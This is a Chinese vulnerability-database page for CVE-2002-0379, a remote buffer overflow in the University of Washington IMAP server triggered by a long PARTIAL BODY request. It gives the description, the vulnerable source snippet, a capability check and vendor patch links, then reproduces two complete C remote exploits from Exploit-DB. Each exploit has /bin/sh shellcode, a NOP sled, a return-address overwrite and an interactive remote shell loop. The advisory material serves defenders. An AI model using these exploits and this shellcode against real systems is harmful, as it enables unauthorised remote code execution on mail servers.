CVE-2002-0379
CVSS7.5
发布时间 :2002-06-25 00:00:00
修订时间 :2016-10-17 22:19:57
NMCOE    

[原文]Buffer overflow in University of Washington imap server (uw-imapd) imap-2001 (imapd 2001.315) and imap-2001a (imapd 2001.315) with legacy RFC 1730 support, and imapd 2000.287 and earlier, allows remote authenticated users to execute arbitrary code via a long BODY request.


[CNNVD]Wu-imapd部分Mailbox属性远程缓冲区溢出漏洞(CNNVD-200206-092)

        
        Wu-imapd是一款由Washington University开发的IMAP(Internet Message Access Protocol)服务实现,可使用在Linux和Unix操作系统下。
        Wu-imapd在处理部分Mailbox属性请求时存在漏洞,可导致远程攻击者进行缓冲区溢出攻击,以Imapd进程的权限在目标系统上执行任意命令。
        攻击者可以构建不正常的获取部分邮箱属性的请求,导致服务程序产生SIG11错误。问题存在于imapd.c中:
        imapd.c
        -------
        int main (int argc,char *argv[])
        {
         unsigned long i,uid;
         long f;
         char *s,*t,*u,*v,tmp[MAILTMPLEN];
        .
        .
        .
        else if (!strncmp (t,"BODY[",5) && (v = strchr(t+5,']')) &&
        !v[1]){
         strncpy (tmp,t+5,i = v - (t+5));
        .
        .
        .
        else if (!strncmp (t,"BODY.PEEK[",10) &&
         (v = strchr (t+10,']')) && !v[1]) {
         strncpy (tmp,t+10,i = v - (t+10));
        .
        .
        .
        -------
        处理A0666 PARTIAL 1 BODY[AAA...1052bytes..AAA] 1 1 请求时会产生缓冲溢出,精心构建字符串数据可导致以imapd进程的权限在目标系统上执行任意命令。
        此漏洞只影响支持RFC 1730的imapd,在imapd 2001.313和imap-2001.315.默认不安装对此RFC的支持。
        要判断是否imapd存在此漏洞,可运行imap后执行"x capability",信息如下所示:
        下面示例表示有漏洞的服务程序(请暂时停止imapd服务):
         * PREAUTH .....
         x capability
         * CAPABILITY IMAP4 IMAP4REV1 ...
         x OK CAPABILITY completed
        
        下面示例表示不存在漏洞的服务程序:
         * PREAUTH .....
         x capability
         * CAPABILITY IMAP4REV1 ...
         x OK CAPABILITY completed
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:university_of_washington:uw-imap:2000.284
cpe:/a:university_of_washington:uw-imap:2000.315
cpe:/a:university_of_washington:uw-imap:2000.287
cpe:/a:university_of_washington:uw-imap:2000.283

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0379
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0379
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200206-092
(官方数据源) CNNVD

- 其它链接及资源

ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2002-021.0.txt
(UNKNOWN)  CALDERA  CSSA-2002-021.0
http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000487
(UNKNOWN)  CONECTIVA  CLA-2002:487
http://marc.info/?l=bugtraq&m=102107222100529&w=2
(UNKNOWN)  BUGTRAQ  20020510 wu-imap buffer overflow condition
http://online.securityfocus.com/advisories/4167
(UNKNOWN)  HP  HPSBTL0205-043
http://www.iss.net/security_center/static/9055.php
(UNKNOWN)  XF  wuimapd-partial-mailbox-bo(9055)
http://www.kb.cert.org/vuls/id/961489
(UNKNOWN)  CERT-VN  VU#961489
http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-034.php
(UNKNOWN)  MANDRAKE  MDKSA-2002:034
http://www.linuxsecurity.com/advisories/other_advisory-2120.html
(UNKNOWN)  ENGARDE  ESA-20020607-013
http://www.redhat.com/support/errata/RHSA-2002-092.html
(UNKNOWN)  REDHAT  RHSA-2002:092
http://www.securityfocus.com/bid/4713
(UNKNOWN)  BID  4713
http://www.washington.edu/imap/buffer.html
(UNKNOWN)  CONFIRM  http://www.washington.edu/imap/buffer.html
http://xforce.iss.net/xforce/xfdb/10803
(UNKNOWN)  XF  wuimapd-authenticated-user-bo(10803)

- 漏洞信息

Wu-imapd部分Mailbox属性远程缓冲区溢出漏洞
高危 边界条件错误
2002-06-25 00:00:00 2007-02-07 00:00:00
远程  
        
        Wu-imapd是一款由Washington University开发的IMAP(Internet Message Access Protocol)服务实现,可使用在Linux和Unix操作系统下。
        Wu-imapd在处理部分Mailbox属性请求时存在漏洞,可导致远程攻击者进行缓冲区溢出攻击,以Imapd进程的权限在目标系统上执行任意命令。
        攻击者可以构建不正常的获取部分邮箱属性的请求,导致服务程序产生SIG11错误。问题存在于imapd.c中:
        imapd.c
        -------
        int main (int argc,char *argv[])
        {
         unsigned long i,uid;
         long f;
         char *s,*t,*u,*v,tmp[MAILTMPLEN];
        .
        .
        .
        else if (!strncmp (t,"BODY[",5) && (v = strchr(t+5,']')) &&
        !v[1]){
         strncpy (tmp,t+5,i = v - (t+5));
        .
        .
        .
        else if (!strncmp (t,"BODY.PEEK[",10) &&
         (v = strchr (t+10,']')) && !v[1]) {
         strncpy (tmp,t+10,i = v - (t+10));
        .
        .
        .
        -------
        处理A0666 PARTIAL 1 BODY[AAA...1052bytes..AAA] 1 1 请求时会产生缓冲溢出,精心构建字符串数据可导致以imapd进程的权限在目标系统上执行任意命令。
        此漏洞只影响支持RFC 1730的imapd,在imapd 2001.313和imap-2001.315.默认不安装对此RFC的支持。
        要判断是否imapd存在此漏洞,可运行imap后执行"x capability",信息如下所示:
        下面示例表示有漏洞的服务程序(请暂时停止imapd服务):
         * PREAUTH .....
         x capability
         * CAPABILITY IMAP4 IMAP4REV1 ...
         x OK CAPABILITY completed
        
        下面示例表示不存在漏洞的服务程序:
         * PREAUTH .....
         x capability
         * CAPABILITY IMAP4REV1 ...
         x OK CAPABILITY completed
        

- 公告与补丁

        厂商补丁:
        Caldera
        -------
        Caldera已经为此发布了一个安全公告(CSSA-2002-021.0)以及相应补丁:
        CSSA-2002-021.0:Linux: imapd buffer overflow when fetching partial mailbox attributes
        链接:
        http://www.caldera.com/support/security/advisories/CSSA-2002-021.0.txt

        补丁下载:
        ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Server/current/RPMS
        ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Workstation/current/RPMS
        ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/RPMS
        ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/RPMS
        补丁安装:
        # rpm -Fvh package_name
        Conectiva
        ---------
        Conectiva已经为此发布了一个安全公告(CLA-2002:487)以及相应补丁:
        CLA-2002:487:imap
        链接:
        http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000487

        补丁下载:
        ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/imap-2000c-10U60_3cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/imap-2000c-10U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/imap-devel-2000c-10U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/imap-devel-static-2000c-10U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/imap-doc-2000c-10U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/imap-2000c-10U70_3cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/imap-2000c-10U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/imap-devel-2000c-10U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/imap-devel-static-2000c-10U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/imap-doc-2000c-10U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/SRPMS/imap-2000c-12U8_2cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/imap-2000c-12U8_2cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/imap-devel-2000c-12U8_2cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/imap-devel-static-2000c-12U8_2cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/imap-doc-2000c-12U8_2cl.i386.rpm
        Conectiva Linux version 6.0及以上版本的用户可以使用apt进行RPM包的更新:
        - 把以下的文本行加入到/etc/apt/sources.list文件中:
        
        rpm [cncbr] ftp://atualizacoes.conectiva.com.br 6.0/conectiva updates
        (如果你不是使用6.0版本,用合适的版本号代替上面的6.0)
        - 执行: apt-get update
        - 更新以后,再执行: apt-get upgrade
        MandrakeSoft
        ------------
        MandrakeSoft已经为此发布了一个安全公告(MDKSA-2002:034)以及相应补丁:
        MDKSA-2002:034:imap
        链接:
        http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-034.php

        补丁下载:
        Updated Packages:
        Linux-Mandrake 7.1:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.1/RPMS/imap-2000c-4.9mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.1/RPMS/imap-devel-2000c-4.9mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.1/SRPMS/imap-2000c-4.9mdk.src.rpm
        Linux-Mandrake 7.2:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.2/RPMS/imap-2000c-4.8mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.2/RPMS/imap-devel-2000c-4.8mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.2/SRPMS/imap-2000c-4.8mdk.src.rpm
        Mandrake Linux 8.0:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.0/RPMS/imap-2000c-4.7mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.0/RPMS/imap-devel-2000c-4.7mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.0/SRPMS/imap-2000c-4.7mdk.src.rpm
        Mandrake Linux 8.0/ppc:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.0/RPMS/imap-2000c-4.7mdk.ppc.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.0/RPMS/imap-devel-2000c-4.7mdk.ppc.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.0/SRPMS/imap-2000c-4.7mdk.src.rpm
        Mandrake Linux 8.1:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/RPMS/imap-2000c-7.1mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/

- 漏洞信息 (21442)

Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (1) (EDBID:21442)
linux remote
2002-05-10 Verified
0 korty
N/A [点击下载]
source: http://www.securityfocus.com/bid/4713/info

Wu-imapd is vulnerable to a buffer overflow condition. This has been reported to occur when a valid user requests partial mailbox attributes. Exploitation may result in the execution of arbitrary code as the server process. An attacker may also be able to crash the server, resulting in a denial of service condition.

This only affects versions of imapd with legacy RFC 1730 support, which is disabled by default in imapd 2001.313 and imap-2001.315. 

/*
 * http://www.freeweb.nu/mantra/05_2002/uw-imapd.html
 *
 * uw-imapd.c - Remote exploit for uw imapd CAPABILITY IMAP4
 *
 * Copyright (C) 2002  Christophe "korty" Bailleux <cb@t-online.fr>
 * Copyright (C) 2002  Kostya Kortchinsky <kostya.kortchinsky@renater.fr>
 *
 * All Rights Reserved
 * The copyright notice above does not evidence any
 * actual or intended publication of such source code.
 *
 * Usage: ./wu-imap host user password shellcode_addressr alignement
 *
 * Demonstration values for Linux:
 *
 * (slackware 7.1) ./uw-imap localhost test test1234 0xbffffa60 0
 * (Redhat 7.2)    ./uw-imap localhost test test1234 0xbffff760 0
 *
 * THIS CODE FOR EDUCATIONAL USE ONLY IN AN ETHICAL MANNER
 *
 * The code is dirty...but we like dirty things :)
 * And it works very well :)
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include  <sys/types.h>
#include  <sys/socket.h>
#include  <netinet/in.h>
#include  <stdio.h>
#include  <string.h>
#include  <netdb.h>

#define GOOD_EXIT    0
#define ERROR_EXIT    1

#define DEFAULT_PROTOCOL  0
#define SEND_FLAGS    0
#define RECV_FLAGS    0

char sc[]=
"\xeb\x38"                      /* jmp 0x38              */
"\x5e"                          /* popl %esi             */
"\x80\x46\x01\x50"              /* addb $0x50,0x1(%esi)  */
"\x80\x46\x02\x50"              /* addb $0x50,0x2(%esi)  */
"\x80\x46\x03\x50"              /* addb $0x50,0x3(%esi)  */
"\x80\x46\x05\x50"              /* addb $0x50,0x5(%esi)  */
"\x80\x46\x06\x50"              /* addb $0x50,0x6(%esi)  */
"\x89\xf0"                      /* movl %esi,%eax        */
"\x83\xc0\x08"                  /* addl $0x8,%eax        */
"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
"\x31\xc0"                      /* xorl %eax,%eax        */
"\x88\x46\x07"                  /* movb %eax,0x7(%esi)   */
"\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
"\xb0\x0b"                      /* movb $0xb,%al         */
"\x89\xf3"                      /* movl %esi,%ebx        */
"\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
"\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
"\xcd\x80"                      /* int $0x80             */
"\x31\xdb"                      /* xorl %ebx,%ebx        */
"\x89\xd8"                      /* movl %ebx,%eax        */
"\x40"                          /* inc %eax              */
"\xcd\x80"                      /* int $0x80             */
"\xe8\xc3\xff\xff\xff"          /* call -0x3d            */
"\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh"     */

int imap_send(int s, char *buffer)
{
  int result = GOOD_EXIT;

  if (send(s, buffer, strlen(buffer), SEND_FLAGS) < 0)
    result = ERROR_EXIT;

  return result;
}

int imap_receive(int s, char *buffer, int size)
{
  int result = GOOD_EXIT;
  int char_recv;
  int tot_recv = 0;

  bzero(buffer, size);
  do {
    char_recv = recv(s, &buffer[tot_recv], size - tot_recv, RECV_FLAGS);
    if (char_recv > 0)
      tot_recv += char_recv;
  } while ((char_recv > 0) && (strchr(buffer, 13) == NULL));

  if (char_recv < 0)
    result = ERROR_EXIT;

  return result;
}

#define BANNER "pwd ; uname -a"

int interact( int fd )
{
     fd_set fds;
     ssize_t ssize;
     char buffer[ 666 ];

   write( fd, BANNER"\n", sizeof(BANNER) );
     while ( 12 != 42 ) {
           FD_ZERO( &fds );
           FD_SET( STDIN_FILENO, &fds );
           FD_SET( fd, &fds);
           select( fd + 1, &fds, NULL, NULL, NULL );

           if ( FD_ISSET(STDIN_FILENO, &fds) ) {
              ssize = read( STDIN_FILENO, buffer, sizeof(buffer) );
              if ( ssize < 0 ) {
                 return( -1 );
              }
              if ( ssize == 0 ) {
                 return( 0 );
              }

              write( fd, buffer, ssize );

           }

           if ( FD_ISSET(fd, &fds) ) {
               ssize = read( fd, buffer, sizeof(buffer) );
               if ( ssize < 0 ) {
                  return( -1 );
                }
               if ( ssize == 0 ) {
                  return( 0 );
               }

               write( STDOUT_FILENO, buffer, ssize );

           }
     }
     return( -1 );
 }


void usage(char *cmd)
{
  printf("Usage: %s host user pass shellcode_addr align\n", cmd);
  printf("Demo: %s localhost test test1234 0xbffffa40 0\n", cmd);
  exit(0);
}


int main(int argc, char *argv[])
{
  struct sockaddr_in server;
  struct servent *sp;
  struct hostent *hp;
  int s, i , ret, align;
  int blaw = 1024;
  char *user, *passwd;

  char imap_info[4096];
  char imap_login[4096];
  char imap_query[4096];
  char buffer[2048];

  int exit_code = GOOD_EXIT;

  if (argc != 6) usage(argv[0]);

  user = argv[2];
  passwd = argv[3];
  ret = strtoul(argv[4], NULL, 16);
  align = atoi(argv[5]);

  if ((hp = gethostbyname(argv[1])) == NULL)
    exit_code = ERROR_EXIT;

  if ((exit_code == GOOD_EXIT) && (sp = getservbyname("imap2", "tcp")) ==
NULL)
    exit_code = ERROR_EXIT;

  if (exit_code == GOOD_EXIT) {
    if ((s = socket(PF_INET, SOCK_STREAM, DEFAULT_PROTOCOL)) < 0)
      return exit_code = ERROR_EXIT;

    bzero((char *) &server, sizeof(server));
    bcopy(hp->h_addr, (char *) &server.sin_addr, hp->h_length);
    server.sin_family = hp->h_addrtype;
    server.sin_port = sp->s_port;
    if (connect(s, (struct sockaddr *) &server, sizeof(server)) < 0)
      exit_code = ERROR_EXIT;
    else {
      printf(" [1;34mV�rification de la banni�re : [0m\n");
      if (exit_code = imap_receive(s, imap_info, sizeof(imap_info)) ==
ERROR_EXIT) {
        shutdown(s, 2);
        close(s);
        return exit_code;
      }

      printf("%s", imap_info);
      if (strstr(imap_info, "IMAP4rev1 200") == NULL) {
        printf(" [1;32mService IMAPd non reconnu ... [0m\n");
        shutdown(s, 2);
        close(s);
        return exit_code;
      }

      if ((exit_code = imap_send(s, "x CAPABILITY\n")) == ERROR_EXIT) {
        shutdown(s, 2);
        close(s);
        return exit_code;
      }

      printf(" [1;34mV�rification des options du service : [0m\n");
      if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==
ERROR_EXIT) {
        shutdown(s, 2);
        close(s);
        return exit_code;
      }

      printf("%s", imap_info);
      if (strstr(imap_info, " IMAP4 ") == NULL) {
        printf(" [1;32mService IMAPd non vuln�rable ... [0m\n");
        shutdown(s, 2);
        close(s);
        return exit_code;
      }

      printf(" [1;31mService IMAPd vuln�rable ... [0m\n");
      sprintf(imap_login, "x LOGIN %s %s\n", user, passwd);
      if ((exit_code = imap_send(s, imap_login)) == ERROR_EXIT) {
        shutdown(s, 2);
        close(s);
        return exit_code;
      }

      if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==
ERROR_EXIT) {
        shutdown(s, 2);
        close(s);
        return exit_code;
      }
      printf("%s", imap_info);

      if ((exit_code = imap_send(s, "x SELECT Inbox\n")) == ERROR_EXIT) {
        shutdown(s, 2);
        close(s);
        return exit_code;
      }

      if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==
ERROR_EXIT) {
        shutdown(s, 2);
        close(s);
        return exit_code;
      }
      printf("%s", imap_info);

      memset(buffer, 0x90, sizeof(buffer));
      memcpy(buffer + 512, sc, strlen(sc));

      for (i = blaw + align ; i < 1096; i +=4)
        *(unsigned int *)(&buffer[i]) = ret;

      *(unsigned int *)(&buffer[i + 1]) = 0;

      sprintf(imap_query, "x PARTIAL 1 BODY[%s] 1 1\n", buffer);
      if ((exit_code = imap_send(s, imap_query)) == ERROR_EXIT) {
        shutdown(s, 2);
        close(s);
        return exit_code;
      }

      if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==
ERROR_EXIT) {
        shutdown(s, 2);
        close(s);
        return exit_code;
      }

      if ((exit_code = imap_send(s, "x LOGOUT\n")) == ERROR_EXIT) {
        shutdown(s, 2);
        close(s);
        return exit_code;
      }

      if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==
ERROR_EXIT) {
        shutdown(s, 2);
        close(s);
        return exit_code;
      }
    }
  }

      i = interact( s );

  return exit_code;
}
		

- 漏洞信息 (21443)

Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (2) (EDBID:21443)
linux remote
2002-05-10 Verified
0 0x3a0x29 crew
N/A [点击下载]
source: http://www.securityfocus.com/bid/4713/info
 
Wu-imapd is vulnerable to a buffer overflow condition. This has been reported to occur when a valid user requests partial mailbox attributes. Exploitation may result in the execution of arbitrary code as the server process. An attacker may also be able to crash the server, resulting in a denial of service condition.
 
This only affects versions of imapd with legacy RFC 1730 support, which is disabled by default in imapd 2001.313 and imap-2001.315.

/*
 * 0x3a0x29wuim.c - WU-IMAP 2000.287 (linux/i86) remote exploit
 *
 * dekadish
 *
 *  0x3a0x29 crew
 *
 */

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define RETADDR 0x080eb395 /* My Debian 2.2 box */
#define MAILDIR "/var/spool/mail"

char shellcode[] =
 "\x55\x89\xe5\x55\x89\xe5\x83\xec\x28\xc6\x45\xd8\x2f\xc6\x45\xdc"
 "\x2f\xc6\x45\xd9\x5f\xc6\x45\xda\x5a\xc6\x45\xdb\x5f\xc6\x45\xdd"
 "\x5f\xc6\x45\xde\x5f\x83\x45\xd9\x03\x83\x45\xda\x0f\x83\x45\xdb"
 "\x0f\x83\x45\xdd\x14\x83\x45\xde\x09\x31\xc0\x89\x45\xdf\x89\x45"
 "\xf4\x8d\x45\xd8\x89\x45\xf0\x83\xec\x04\x8d\x45\xf0\x31\xd2\x89"
 "\xd3\x89\xc1\x8b\x45\xf0\x89\xc3\x31\xc0\x83\xc0\x0b\xcd\x80\x31"
 "\xc0\x40\xcd\x80";

int main(int argc, char *argv[])
{
	int s, i;
	fd_set fds;
	char tmp[2048], buf[1060];
	char *target, *login, *pass, *p;
	struct sockaddr_in sock;
	unsigned long retaddr;

	fprintf(stderr, "%s\n", "[The #smile Crew]");
	if (argc != 4)
	{
		fprintf(stderr, "Usage: %s <Target ip> <Login> <Password>\n", argv[0]);
		exit(-1);
	}

	retaddr = RETADDR;
	target  = argv[1];
	login   = argv[2];
	pass    = argv[3];

	s = socket(AF_INET, SOCK_STREAM, 0);
	sock.sin_port = htons(143);
	sock.sin_family = AF_INET;
	sock.sin_addr.s_addr = inet_addr(target);

	printf("\nConnecting to %s:143...", target);
	fflush(stdout);
	if ((connect(s, (struct sockaddr *)&sock, sizeof(sock))) < 0)
	{
		printf("failed\n");
		exit(-1);
	}
	else
		recv(s, tmp, sizeof(tmp), 0);

	printf("done\nLogging in...");
	fflush(stdout);
	snprintf(tmp, sizeof(tmp), "A0666 LOGIN %s %s\n", login, pass);
	send(s, tmp, strlen(tmp), 0);
	recv(s, tmp, sizeof(tmp), 0);

	if (!strstr(tmp, "completed"))
	{
		printf("failed\n");
		exit(-1);
	}

	printf("done\nExploiting...");
	fflush(stdout);

	dprintf(s, "A0666 SELECT %s/%s\n", MAILDIR, login);

	memset(buf, 0x0, sizeof(buf));
	p = buf;
	memset(p, 0x90, 928);
	p += 928;
	memcpy(p, shellcode, 100);
	p += 100;

	for (i=0; i<6; i++)
	{
		memcpy(p, &retaddr, 0x4);
		p += 0x4;
	}

	snprintf(tmp, sizeof(tmp), "A0666 PARTIAL 1 BODY[%s] 1 1\n", buf);
	send(s, tmp, strlen(tmp), 0);
	dprintf(s, "A0666 LOGOUT\n");
	sleep(5);
	printf("done\n\n");

	read(s, tmp, sizeof(tmp));
	dprintf(s, "uname -a;id;\n");
	memset(tmp, 0x0, sizeof(tmp));

	while (1)
	{
		FD_ZERO(&fds);
		FD_SET(s, &fds);
		FD_SET(1, &fds);

		select((s+1), &fds, 0, 0, 0);

		if (FD_ISSET(s, &fds))
		{
			if ((i = recv(s, tmp, sizeof(tmp), 0)) < 1)
			{
				fprintf(stderr, "Connection closed\n");
				exit(0);
			}
			write(0, tmp, i);
		}
		if (FD_ISSET(1, &fds))
		{
			i = read(1, tmp, sizeof(tmp));
			send(s, tmp, i, 0);
		}
	}

	return;
}
		

- 漏洞信息

790
UoW imap Server (uw-imapd) BODY Request Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2002-05-10 Unknow
2002-05-10 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站